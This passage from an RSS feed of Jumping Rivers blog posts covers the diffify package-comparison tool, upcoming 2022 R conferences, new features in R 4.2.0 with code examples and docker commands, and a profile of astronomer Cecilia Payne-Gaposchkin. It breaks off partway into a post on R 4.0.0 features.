&lt;p&gt;Simply type in the name of the package you wish to look at. By default, the two most recent versions of this package will be compared. However, if you wish to compare different versions you can select these from the &amp;ldquo;Earlier version&amp;rdquo; and &amp;ldquo;Later version&amp;rdquo; drop-down menus. For this blog post we have chosen to &lt;a href="https://diffify.com/R/dplyr/1.0.5/1.0.8" rel="external"&gt;compare the changes&lt;/a&gt; from Version 1.0.5 to Version 1.0.8 of the dplyr package.&lt;/p&gt;
&lt;img src="res_dplyr_homepage.png" title="Comparing Version 1.0.5 to Version 1.0.8 of dplyr." alt="Comparing Version 1.0.5 to Version 1.0.8 of dplyr." width="1400" style="width:700px" class="image-center" /&gt;
&lt;h3 id="news"&gt;News&lt;/h3&gt;
&lt;p&gt;This gives you the information in the News file for each version released between &amp;ldquo;Earlier version&amp;rdquo; and &amp;ldquo;Later version&amp;rdquo;.&lt;/p&gt;
&lt;img src="dplyr_news.png" title="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr NEWS file." alt="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr NEWS file." width="1261" style="width:700px" class="image-center" /&gt;
&lt;h3 id="dependencies"&gt;Dependencies&lt;/h3&gt;
&lt;p&gt;Here you can compare the dependencies between the two versions. You can see which imports, suggests, depends and enhances have been added or removed. You can also see if the version requirement for a dependency has changed.&lt;/p&gt;
&lt;img src="dplyr_depends.png" title="Comparing Version 1.0.5 to Version 1.0.8 of dplyr Depends." alt="Comparing Version 1.0.5 to Version 1.0.8 of dplyr Depends." width="1312" style="width:700px" class="image-center" /&gt;
&lt;h3 id="namespace"&gt;Namespace&lt;/h3&gt;
&lt;p&gt;Here you can see all exported objects which have been added or removed. You can also toggle between different types of exported objects.&lt;/p&gt;
&lt;img src="dplyr_namespace.png" title="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr NAMESPACE file." alt="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr NAMESPACE file." width="1309" style="width:700px" class="image-center" /&gt;
&lt;h3 id="functions"&gt;Functions&lt;/h3&gt;
&lt;p&gt;Here you can find out more detail on the functions of the package. You can see the functions which have been removed, added or changed.&lt;/p&gt;
&lt;img src="dplyr_functions.png" title="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr functions." alt="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr functions." width="1309" style="width:700px" class="image-center" /&gt;
&lt;p&gt;Where a function has been changed, the function arguments for both versions are displayed. Arguments that have been added, removed, or for which the default value has changed, are highlighted. In the example below we can see the arguments &lt;code&gt;caller_env&lt;/code&gt; and &lt;code&gt;error_call&lt;/code&gt; have been added to the &lt;code&gt;distinct_prepare()&lt;/code&gt; function between Version 1.0.5 and Version 1.0.8 of {dplyr}.&lt;/p&gt;
&lt;img src="dplyr_changed_args.png" title="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr function arguments." alt="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr function arguments." width="1018" style="width:700px" class="image-center" /&gt;
&lt;p&gt;Want to check it out for yourself? Head over to &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt; to start comparing. Or save this link to bookmarks for when you need to check a version diff.&lt;/p&gt;
&lt;p&gt;If you spot any bugs on the site please raise an issue at &lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;github.com/jumpingrivers/diffify&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-launch/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Upcoming R conferences (2022)</title><link>https://www.jumpingrivers.com/blog/upcoming-r-conferences/</link><pubDate>Fri, 08 Apr 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/upcoming-r-conferences/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-conferences/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/upcoming-r-conferences/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The daffodils are out, the sun is shining(ish), spring is in the air! And that means that it’s time to start planning for the conference season.&lt;/p&gt;
&lt;p&gt;This year we’ll be treated to a lot more in-person conferences for the first time since 2020, but for those of you who either prefer the online formats, or are still a bit hesitant about attending large conferences, fear not! There are many online and hybrid conferences for you to enjoy, and we’ve included a few highlights below.&lt;/p&gt;
&lt;p&gt;We also maintain a list of &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;upcoming Rstats conferences&lt;/a&gt;, so take a look and see if there’s anything that catches your eye.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="whyr-turkey-online"&gt;WhyR? Turkey (online)&lt;/h3&gt;
&lt;p&gt;WhyR? Turkey is a conference which aims to bring together Turkish data scientists and R users from around the world to share their knowledge and expertise through talks, panels and workshops.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;15-17 April: &lt;a href="https://whyr.pl/2022/turkey/en/" rel="external"&gt;Why R? Turkey 2022&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="user-online"&gt;useR! (online)&lt;/h3&gt;
&lt;p&gt;useR! is aimed at anyone and everyone who uses R in any capacity, from data scientists to students. With talks, panels, poster sessions and tutorials, this conference has something for everyone, whatever your level of R experience.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;20th-23rd June: &lt;a href="https://user2022.r-project.org/" rel="external"&gt;useR! 2022&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2 id="come-and-say-hi"&gt;Come and say hi!&lt;/h2&gt;
&lt;p&gt;Of course, we’re not going to be missing out on all of the fun! This year we’ll be attending several conferences, so keep an eye out to come and say hi, or to get your hands on one of the legendary Jumping Rivers coasters.&lt;/p&gt;
&lt;h3 id="big-data-belfast"&gt;Big Data Belfast&lt;/h3&gt;
&lt;p&gt;This one-day conference hosted in the heart of &lt;strong&gt;Belfast&lt;/strong&gt; is an opportunity for data scientists and business leaders from a wide array of industries to come together, network, exchange ideas and learn how data science can benefit them in their day-to-day work.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;25th May: &lt;a href="https://www.bigdatabelfast.com/" rel="external"&gt;Big Data Belfast&lt;/a&gt; - Belfast, UK&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="rstudioconf"&gt;rstudio::conf&lt;/h3&gt;
&lt;p&gt;rstudio::conf is back in person this year, this time in &lt;strong&gt;Washington DC&lt;/strong&gt;. This conference is a great opportunity for anyone who uses RStudio to meet up, attend workshops and talks from RStudio experts to learn new and exciting things and generally discuss all things RStudio. We’ll be attending this one, so if you see us around feel free to say hello.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;25th-28th July: &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf&lt;/a&gt; - Washington DC, USA&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="earl"&gt;EARL&lt;/h3&gt;
&lt;p&gt;The EARL conference is also now back in person in &lt;strong&gt;London&lt;/strong&gt;. This conference caters to everyone who uses R for real-world applications. If you use R as part of your work, EARL is for you. Keep an eye out for Jumping Rivers’ presence at this one, as we’ll be exhibiting.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;6th-8th September: &lt;a href="https://info.mango-solutions.com/earl-conference-2022" rel="external"&gt;EARL Conference 2022&lt;/a&gt; - London, UK&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="rss-international"&gt;RSS International&lt;/h3&gt;
&lt;p&gt;The Royal Statistical Society international conference is taking place in person in &lt;strong&gt;Aberdeen&lt;/strong&gt; this year. This one is aimed at anyone interested in statistics or data science, and is a place for people from all over the world to come together and share their knowledge and experience. We’ll be exhibiting at this one, so come say hello.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;12th-15th September: &lt;a href="https://rss.org.uk/conference2022/" rel="external"&gt;RSS International Conference 2022&lt;/a&gt; - Aberdeen, UK&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-conferences/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>New features in R 4.2.0</title><link>https://www.jumpingrivers.com/blog/new-features-r420/</link><pubDate>Fri, 01 Apr 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/new-features-r420/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/new-features-r420/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/new-features-r420/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="r-420-is-due-to-be-released"&gt;R-4.2.0 is due to be released!&lt;/h1&gt;
&lt;p&gt;Another year has passed, which means an updated version of R is due to
be released - R version 4.2.0. As usual there have been many &lt;a href="https://stat.ethz.ch/R-manual/R-devel/doc/html/NEWS.html" rel="external"&gt;changes
and
improvements&lt;/a&gt;
over the last year. This blog post only picks out a tiny handful, but
there are dozens of smaller changes and bug fixes that can be found in
the
&lt;a href="https://stat.ethz.ch/R-manual/R-devel/doc/html/NEWS.html" rel="external"&gt;changelog&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-new-features-r420"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="pipe-updates"&gt;Pipe updates&lt;/h2&gt;
&lt;p&gt;The native pipe &lt;code&gt;|&amp;gt;&lt;/code&gt; was introduced in
&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R 4.1.0&lt;/a&gt;.
This release has introduced the &lt;code&gt;_&lt;/code&gt; that can be used as a placeholder in
a named argument. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# This works in R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Side note: some of the older R users amongst us still remember when &lt;code&gt;_&lt;/code&gt;
was used as an assignment operator!&lt;/p&gt;
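&lt;p&gt;As a rough comparison, here is a small sketch of the same model fitted with the R 4.1 workaround (an anonymous function) and with the R 4.2 placeholder. The object names &lt;code&gt;fit_lambda&lt;/code&gt; and &lt;code&gt;fit_placeholder&lt;/code&gt; are ours, chosen purely for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# R 4.1 workaround: wrap the call in an anonymous function
fit_lambda &amp;lt;- mtcars |&amp;gt;
  (\(d) lm(mpg ~ disp, data = d))()

# R 4.2: the placeholder is passed to a named argument
fit_placeholder &amp;lt;- mtcars |&amp;gt;
  lm(mpg ~ disp, data = _)

# Compare the fitted coefficients from the two approaches
all.equal(coef(fit_lambda), coef(fit_placeholder))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;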
&lt;h2 id="improved-help-page"&gt;Improved help page&lt;/h2&gt;
&lt;p&gt;The HTML help system has a few new features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;LaTeX-like mathematics can be typeset using either
&lt;a href="https://katex.org/" rel="external"&gt;KaTeX&lt;/a&gt; or &lt;a href="https://www.mathjax.org/" rel="external"&gt;MathJax&lt;/a&gt;,
and usage and example code is highlighted using
&lt;a href="https://prismjs.com/" rel="external"&gt;Prism&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Dynamic help for examples and code demos using {knitr}.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The HTML help system now uses HTML5 (via
&lt;a href="https://bugs.r-project.org/show_bug.cgi?id=18149" rel="external"&gt;PR#18149&lt;/a&gt;). What
this means for everyday R users is that the help pages look a lot
nicer:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/new-features-r420/lm-help.png" title="The lm help page with R 4.2.0" alt="The lm help page with R 4.2.0" style="width:500px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;The examples can now be easily run using the &lt;code&gt;Run Examples&lt;/code&gt; button:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/new-features-r420/run-examples.png" title="The Run example page using 4.2.0" alt="The Run example page using 4.2.0" style="width:500px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;h2 id="if-and-while-statements"&gt;if and while statements&lt;/h2&gt;
&lt;p&gt;Calling &lt;code&gt;while()&lt;/code&gt; or &lt;code&gt;if()&lt;/code&gt; statements with a condition of length
greater than one now gives an error rather than a warning.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;do_something&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Error in if (1:2 == 1) do_something() : the condition has length &amp;gt; 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is clearly a &lt;em&gt;good&lt;/em&gt; thing, as when the length of the condition is
greater than one, this is almost certainly an error. If you are using
older versions of R, you can set &lt;code&gt;_R_CHECK_LENGTH_1_CONDITION_&lt;/code&gt; to
&lt;code&gt;true&lt;/code&gt; in your &lt;code&gt;.Renviron&lt;/code&gt; to get the same effect.&lt;/p&gt;
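&lt;p&gt;If existing code trips over this change, the usual fix is to say explicitly how the vector should be reduced to a single value. A minimal sketch, where the vector &lt;code&gt;x&lt;/code&gt; and the messages are made up for illustration:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;x &amp;lt;- 1:2

# Collapse the comparison to a single TRUE/FALSE before testing it
if (any(x == 1)) message(&amp;#34;at least one element equals 1&amp;#34;)
if (all(x == 1)) message(&amp;#34;every element equals 1&amp;#34;)

# Or test one specific element
if (x[1] == 1) message(&amp;#34;the first element equals 1&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;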
&lt;h2 id="changes-to-windows"&gt;Changes to Windows&lt;/h2&gt;
&lt;p&gt;There are quite a few changes on Windows, in particular:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Support for 32-bit builds has been dropped.&lt;/li&gt;
&lt;li&gt;UTF-8 locales are used where available.&lt;/li&gt;
&lt;li&gt;The default personal library on Windows, folder &lt;code&gt;R\win-library\x.y&lt;/code&gt;
where &lt;code&gt;x.y&lt;/code&gt; stands for R release &lt;code&gt;x.y.z&lt;/code&gt;, is now a subdirectory of
the local application data directory (usually a hidden directory
&lt;code&gt;C:\Users\username\AppData\Local&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="data-frames-gain-a-new-method"&gt;Data frames gain a new method&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;as.vector()&lt;/code&gt; function gains an S3 data frame method which returns a
simple list.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; as.vector(mtcars[1:5,])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$mpg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] 21.0 21.0 22.8 21.4 18.7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$cyl&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] 6 6 4 6 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$disp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] 160 160 108 258 360&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is a breaking change; in previous versions of R, &lt;code&gt;as.vector()&lt;/code&gt; just
returned the data frame.&lt;/p&gt;
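&lt;p&gt;For code that has to run on both older and newer versions of R, one option is to avoid relying on &lt;code&gt;as.vector()&lt;/code&gt; for data frames and to ask for a list directly. The sketch below uses &lt;code&gt;as.list()&lt;/code&gt; for this; the object names &lt;code&gt;df&lt;/code&gt; and &lt;code&gt;cols&lt;/code&gt; are illustrative only.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;df &amp;lt;- mtcars[1:5, 1:3]

# as.list() drops the data frame class and the row names
cols &amp;lt;- as.list(df)

class(cols)
#&amp;gt; [1] &amp;#34;list&amp;#34;
names(cols)
#&amp;gt; [1] &amp;#34;mpg&amp;#34;  &amp;#34;cyl&amp;#34;  &amp;#34;disp&amp;#34;

# Check what as.vector() returns on the version of R you are running
is.data.frame(as.vector(df))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;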
&lt;h2 id="changes-to-logical-functions"&gt;Changes to logical functions&lt;/h2&gt;
&lt;p&gt;This &lt;strong&gt;was&lt;/strong&gt; part of R 4.2.0, but has been bumped to R-devel as there
are around 200 packages that have to be updated.&lt;/p&gt;
&lt;p&gt;Similar to the &lt;code&gt;if()&lt;/code&gt; and &lt;code&gt;while()&lt;/code&gt; statements, the logical operators
&lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and &lt;code&gt;||&lt;/code&gt; now give a warning when one of the operands has a
length greater than one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Warning message:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In 1:2 &amp;amp;&amp;amp; 1 : &amp;#39;length(x) = 2 &amp;gt; 1&amp;#39; in coercion to &amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In future versions, this will become an error.&lt;/p&gt;
&lt;h2 id="trying-the-latest-version-out-for-yourself"&gt;Trying the latest version out for yourself&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://www.rocker-project.org/" rel="external"&gt;rocker&lt;/a&gt; project takes away the
pain of installing the latest version. If you have Docker installed,
then simply use the &lt;code&gt;devel&lt;/code&gt; version:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -ti rocker/r-ver:devel&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you want to use RStudio as well, then run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run -e &lt;span style="color:#79c0ff"&gt;PASSWORD&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&amp;lt;PASSWORD&amp;gt; -p 8787:8787 rocker/rstudio:devel&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="see-also"&gt;See also&lt;/h2&gt;
&lt;p&gt;Do you have some nostalgia for previous versions of R? If so, check out
our previous blog posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-version-4-features/" rel="external"&gt;R 4.0.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R 4.1.0&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/new-features-r420/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Forgotten Women in Science: Cecilia Payne-Gaposchkin</title><link>https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/</link><pubDate>Mon, 21 Mar 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When starting out on a PhD, we all think (or at least wish) that we are going to make a paradigm-shifting discovery. Unfortunately, this is usually not the case, but it has been known to happen.&lt;/p&gt;
&lt;p&gt;In 1925, &lt;a href="https://en.wikipedia.org/wiki/Cecilia_Payne-Gaposchkin" rel="external"&gt;Cecilia Payne&lt;/a&gt; obtained a PhD with her thesis entitled &lt;a href="https://articles.adsabs.harvard.edu//full/1925PhDT.........1P/0000001,006.html" rel="external"&gt;“Stellar Atmospheres: A contribution to the observational study of high temperature in the reversing layers of stars.”&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Prior to this work it had been generally accepted that stars were just bigger, hotter versions of Earth, made of all the same stuff. By looking at the spectra of light coming from the Sun, Cecilia Payne discovered that stars are actually made of hydrogen and helium, and that hydrogen is in fact one million times more abundant there than on Earth, which drastically changed our view of the Universe and its formation.&lt;/p&gt;
&lt;p&gt;Despite her thesis being described as “undoubtedly the most brilliant PhD thesis ever written in astronomy,” she doubted the legitimacy of her discovery because it went against the general beliefs of the time, describing her own findings as “spurious” – impostor syndrome gets to us all!&lt;/p&gt;
&lt;p&gt;At the time she submitted her PhD thesis, Harvard University did not award doctorates to women – so instead, she became the first person to be awarded a doctorate from Radcliffe College of Harvard University. This is very reminiscent of her experience as an undergraduate at Cambridge University, which also did not award degrees to women, so despite doing all of the work required she was never awarded her degree in physics and chemistry.&lt;/p&gt;
&lt;p&gt;Later, Otto Struve, the person who spoke so highly of her thesis, came to the same conclusion as Payne-Gaposchkin through his own investigations, and while he did acknowledge her in the publications of his findings, he is usually the one credited with this amazing discovery.&lt;/p&gt;
&lt;p&gt;We’re lucky today that issues like this are far less prevalent – however, all is still not equal in the scientific world, with recent estimates giving approximately 258 years until gender equality is reached for physics in particular.&lt;/p&gt;
&lt;p&gt;My hope is that by shining a light on these excellent role models, I will be able to start conversations about gender equality in the sciences, how we’ve grown and where we still need to improve, as well as hopefully inspiring the next generation of scientists to get out there and discover!&lt;/p&gt;
&lt;p&gt;Image credit: Acc. 90-105 - Science Service, Records, 1920s-1970s, Smithsonian Institution Archives&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/women-in-science-cecilia-payne/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Forgotten features of R 4.0.0</title><link>https://www.jumpingrivers.com/blog/r-version-4-features/</link><pubDate>Tue, 25 Jan 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-version-4-features/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-version-4-features/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-version-4-features/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;R &lt;a href="https://cran.r-project.org/doc/manuals/r-release/NEWS.html" rel="external"&gt;version 4.0.0&lt;/a&gt; was released almost two years ago.
The change in the major version, 3.x.y to 4.0.0, represented significant and potentially
breaking changes.
For an organisation to start using these new features, everyone in the company must have access to that version; otherwise code isn&amp;rsquo;t shareable.
This naturally slows down adoption.&lt;/p&gt;
&lt;p&gt;We moved our internal R projects to depend on version R 4.0.0 around twelve months ago - a few
months after the release date.
Over the last year we&amp;rsquo;ve also assisted a number of clients in making the move;
typically with Shiny applications.
This post aims to highlight some of the features we&amp;rsquo;ve found useful and also some of the potential pitfalls.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-version-4-features"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="stringsasfactors"&gt;StringsAsFactors&lt;/h2&gt;
&lt;p&gt;From the &lt;a href="https://developer.r-project.org/Blog/public/2020/02/16/stringsasfactors/" rel="external"&gt;beginning&lt;/a&gt;, R converted imported strings to factors.
For most users, this typically occurred when reading in data using &lt;code&gt;read.csv()&lt;/code&gt;.
This default made sense for statistical modelling, but was a little
tricky for new users, especially as today&amp;rsquo;s data sets tend to
have messy string data.&lt;/p&gt;
&lt;p&gt;In R 4.0.0, this default changed, with stringsAsFactors now being &lt;code&gt;FALSE&lt;/code&gt; by default.
For our internal applications, this didn&amp;rsquo;t really cause issues, but we&amp;rsquo;ve
had to help a number of clients &amp;ldquo;upgrade&amp;rdquo; their Shiny app to run using R version 4.0.0.
If you are planning on making this move, here&amp;rsquo;s our standard &amp;ldquo;gotcha&amp;rdquo; check-list:&lt;/p&gt;
&lt;ul&gt;
